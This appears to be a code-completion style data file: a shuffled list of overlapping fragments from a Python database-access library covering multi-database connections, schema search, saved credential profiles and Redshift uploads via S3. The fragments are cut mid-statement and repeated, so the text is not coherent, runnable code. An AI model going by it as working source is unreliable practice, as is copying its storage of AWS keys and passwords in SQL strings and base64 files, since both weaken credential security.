None:", "= \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP;", "creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype')", "postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype not in", "as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY", "from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table", "# Python 2.7 except: from io import StringIO # Python 3.3+ import uuid", "creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname')", "sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if it doens't exist", "**kwargs): \"\"\" Provides an instance of DB that hooks up to the Chinook", "1 For Those About To Rock (We Salute You) 1 1 1 2", "You) 0.99 1 Balls to the Wall 0.99 2 Fast As a Shark", "# find for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create", "and are a base64 encoded JSON file. This is not to say this", "# perform the \\COPY here. the s3 argument is a prefix, so it'll", "TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock (We", "for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self):", "default port for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql:", "GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+", "and Wild 3 2 4 5 Princess of the Dawn 3 2 5", "performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please", "temporary transfer s3 bucket. This should match your redshift cluster's region. Examples --------", "dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise", "conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>'", "store sensitive data, but it will probably stop your little sister from stealing", "limit=10) Title \\ 0 For Those About To Rock We Salute You 1", "access key. if this is None, the function will try and grab AWS_ACCESS_KEY", "second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our", "all tables containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables", "else: return q return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query", "Wild 5 For Those About To Rock We Salute You 6 For Those", "threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for t in threads:", "str Name of the database schemas: list List of schemas to include. Defaults", "Milliseconds | INTEGER | | Track | GenreId | INTEGER | | Track", "Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of them is installed\")", "bool (False) whether you'd like to drop the table if it already exists", "if self.dbtype is None: raise Exception(\"Database type not specified! Must select one of:", "sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need to convert", "''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About To", "''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10))", "_create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least ones that fit", "| Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist", "raw string. Parameters ---------- q: str Query string to execute data: list, dict", "if port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port =", "else: raise Exception(\"Database type not specified! Must select one of: postgres, sqlite, mysql,", "{{ . }} ... {{else}} ... {{ . }} , ... {{/if}} ...", "self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from a", "cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for", "Restless and Wild 3 Restless and Wild 4 Restless and Wild 5 For", "or not to include \"system\" tables (the ones that the database needs in", "data=data, union=False) AlbumId Title ArtistId 0 1 For Those About To Rock We", "HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC = True except ImportError:", "if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search", "Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries", "if data: q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit)", "Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e))", "For Those About To Rock We Salute You 8 For Those About To", "rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master", "to the Wall 2 Restless and Wild 3 Restless and Wild 4 Restless", "self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor()", "import Table, TableSet from .s3 import S3 from .utils import profile_path, load_profile, load_from_json,", "want to return Examples ---------- >>> from db import DemoDB >>> db =", "doctests to be viable... -= if not, there's always a random issue where", "if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto", "from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\",", "query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query =", "8611245 0.99 >>> q = ''' ... SELECT ... a.Title, ... t.Name, ...", "ArtistId 0 1 For Those About To Rock We Salute You 1 1", "(table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if", "''' ... SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }} ...", "U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>,", "password: str Your password for the database hostname: str Hostname your database is", "self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again", "db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass", "boto.s3.connection.Location a specific AWS location in which to create the temporary transfer s3", "your little sister from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name", "self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else:", "PlaylistId | INTEGER | | Track | TrackId | INTEGER | | Track", "+ name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could", "limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default", "find sqlite library. Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur =", "from db import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId", "import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG = False try:", "data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self,", "self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1.", "| AlbumId | INTEGER | | Track | MediaTypeId | INTEGER | |", "from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for your database", "of PrettyTable a bit. None means that you'll have verrrrrrrry wide columns in", "tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables =", "pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname", "... FROM ... Album a ... INNER JOIN ... Track t ... on", "getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif", "* from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those", "<NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99", "columns in some cases. driver: str, None Driver for mssql/pyodbc connections. Examples --------", "u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f", "db import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name", "the Wall 0.99 2 Fast As a Shark 0.99 3 Restless and Wild", "Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all", "all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP", "f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None)", "from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults", "your passwords. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\",", "data=None, union=True, limit=None): \"\"\" Query your database with a raw string. Parameters ----------", "profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname", "| INTEGER | | PlaylistTrack | PlaylistId | INTEGER | | Track |", "single query for getting all key relationships # 3. use the naive approach", "(10000) Number of DataFrame chunks to upload and COPY from S3. Upload speed", "use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in", "pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\")", "try: import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False", "... {{ . }} , ... {{/if}} ... {{/cols}} ... FROM ... Album;", "adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format.", "self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self):", "| INTEGER | | Track | GenreId | INTEGER | | Track |", "with open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def", "__import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError:", "aws access key. if this is None, the function will try and grab", "profile for how you like your queries exclude_system_tables: bool Whether or not to", "self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None:", "self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the database profiles", "= DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\",", "3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort", "self.dbtype is None: raise Exception(\"Database type not specified! Must select one of: postgres,", "Balls to the Wall 2 Restless and Wild 3 Restless and Wild 4", "arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg =", "= os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables", "= DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\",", "database's schema for a column. Parameters ----------- search: str glob pattern for what", "\"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select * from", "db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f =", "| Invoice | InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER", "of the Dawn 0.99 5 Put The Finger On You 0.99 6 Let's", "SELECT ... '{{ name }}' as table_name, ... COUNT(*) as cnt ... FROM", "self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't", "them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname", "0.99 >>> template = ''' ... SELECT ... '{{ name }}' as table_name,", "Name | Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | |", "# 2. use a single query for getting all key relationships # 3.", "\"\"\" Provides an instance of DB that hooks up to the Chinook DB", "way to store sensitive data, but it will probably stop your little sister", "INTEGER | | Customer | SupportRepId | INTEGER | | Customer | CustomerId", "{{#if @last}} ... {{ . }} ... {{else}} ... {{ . }} ,", "| BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns", "({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info <", "def list_profiles(): \"\"\" Lists all of the database profiles available Examples -------- No", "= TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy", "keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con,", "Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if limit:", "try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID =", "that are varchars +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+", "7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q", "Princess of the Dawn 3 2 5 6 Put The Finger On You", "-------- >>> from db import DemoDB >>> db = DemoDB() >>> q =", "Walks 0.99 \"\"\" with open(filename) as fp: q = fp.read() return self.query(q, data=data,", "from .table import Table, TableSet from .s3 import S3 from .utils import profile_path,", "MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect", "JSON file. This is not to say this a secure way to store", "and reference keys. This is used to control the rendering of PrettyTable a", "foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\"", "\"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def", ">>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\",", "to all. profile: str Preconfigured database credentials / profile for how you like", "... SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}}", "Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache", "and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one", "to the table name in dict for (table_schema, table_name, column_name, data_type) in cols:", "109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About", "except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError:", "t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>>", "TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t", "import the relevant database libraries # TODO: maybe add warnings? try: import psycopg2", "argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must", "---------- filename: str A SQL script data: list, dict Optional argument for handlebars-queries.", "query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library.", "| Album | AlbumId | INTEGER | | Album | ArtistId | INTEGER", "relationships # 3. use the naive approach if use_cache: # generate our Tables,", "db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>>", "str): data_type = [data_type] cols = [] for table in self.tables: for col", "# optimize the foreign/ref key query by doing it one time, database-wide, if", "a raw string. Parameters ---------- q: str Query string to execute data: list,", "= ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables:", "sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = [] tables = [row[0]", "variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function", "q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q #", "secure way to store sensitive data, but it will probably stop your little", "3 2 4 5 Princess of the Dawn 3 2 5 6 Put", "HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of them", "raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of them is", "def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for", "TrackId | INTEGER | | Track | AlbumId | INTEGER | | Track", "a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0", "cases. driver: str, None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\",", "this is None, the function will try and grab AWS_SECRET_KEY from your environment", "bool Whether or not to include \"system\" tables (the ones that the database", "\"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column,", "str path to sqlite database dbname: str Name of the database schemas: list", "''' ... SELECT ... '{{ name }}' as table_name, ... COUNT(*) as cnt", "except ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC = True", "To Rock (We Salute You) 0.99 1 Balls to the Wall 0.99 2", "`query` method, or by passing an argument to `DB()`. None indicates that there", "Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy", "to create the temporary transfer s3 bucket. This should match your redshift cluster's", "Employee | ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER |", "_apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q = unicode(q) template", "db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\")", "tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key", "MediaTypeId | INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\")", "1 1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0", "The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template =", "relevant database libraries # TODO: maybe add warnings? try: import psycopg2 as pg", "metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} #", "elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please", "union=True, limit=None): \"\"\" Query your database from a file. Parameters ---------- filename: str", "dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port =", "AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as", "{0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None,", "# # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df)", "glob pattern for what you're looking for data_type: str, list (optional) specify which", "the table name in dict for (table_schema, table_name, column_name, data_type) in cols: if", "7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q = '''", "each table to the table name in dict for (table_schema, table_name, column_name, data_type)", "dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try:", "DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import", "| MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER", "query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys", "the function will try and grab AWS_SECRET_KEY from your environment variables s3: S3", "self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con", "self.filename) else: db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname,", "Id +---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+ | Album", "= False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a", "is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an", "credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename: db_filename =", "installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur =", "= \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg]", "this a secure way to store sensitive data, but it will probably stop", "column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True,", "single data frame. limit: int Number of records to return Examples -------- >>>", ">>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results", "results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results = db.find_table(\"*\")", "foreign and reference keys. This is used to control the rendering of PrettyTable", "ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in", "= str(query) else: return q return query def query(self, q, data=None, union=True, limit=None):", "1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho...", "# table metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys',", "= DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\",", "of all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else:", "| Employee | Address | NVARCHAR(70) | | Genre | GenreId | INTEGER", "foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name,", "# we can't do this in the function definition because we're # lazily", "import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile)", "prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans", "data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at", "col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} #", "drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to", "Query your database from a file. Parameters ---------- filename: str A SQL script", "os import sys from collections import defaultdict import pandas as pd import pybars", "credentials so you don't have to save them in script. Parameters ---------- profile:", "'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username,", "cache=False): if port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port", "Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if limit: q", "| INTEGER | | Genre | GenreId | INTEGER | | Invoice |", "will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if this", "self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col),", "Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite',", "profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for", "self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key", "boto is present, set the bucket_location to default. # we can't do this", "from your environment variables AWS_SECRET_KEY: str your aws secrety key. if this is", "Customer | CustomerId | INTEGER | | Employee | ReportsTo | INTEGER |", "database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str):", "Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719", "<NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>,", "0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q =", "database hostname: str Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\") port:", "specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache =", "conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password )", "A SQL script data: list, dict Optional argument for handlebars-queries. Data will be", "def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\"", "creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials", "time to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to", "to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create", ">>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in", "not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY", "self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username,", "print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and then adapt", "prefix, so it'll pick up # all of the data*.gz files we've created", "down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def", "ALL\" handlebars templates. This will return any handlebars queries as a single data", "them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t],", "> 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation", "len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns)", "profile: str Preconfigured database credentials / profile for how you like your queries", "= defaultdict(list) for rel in self.cur: # second value in relationship tuple is", "in some way for all those doctests to be viable... -= if not,", "Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album |", "to default port for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a", "\"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self,", "= self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system']", "save them in script. Parameters ---------- profile: str (optional) identifier/name for your database", "| | PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId |", "5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId", "def __repr__(self): return self.__str__() def __delete__(self): del 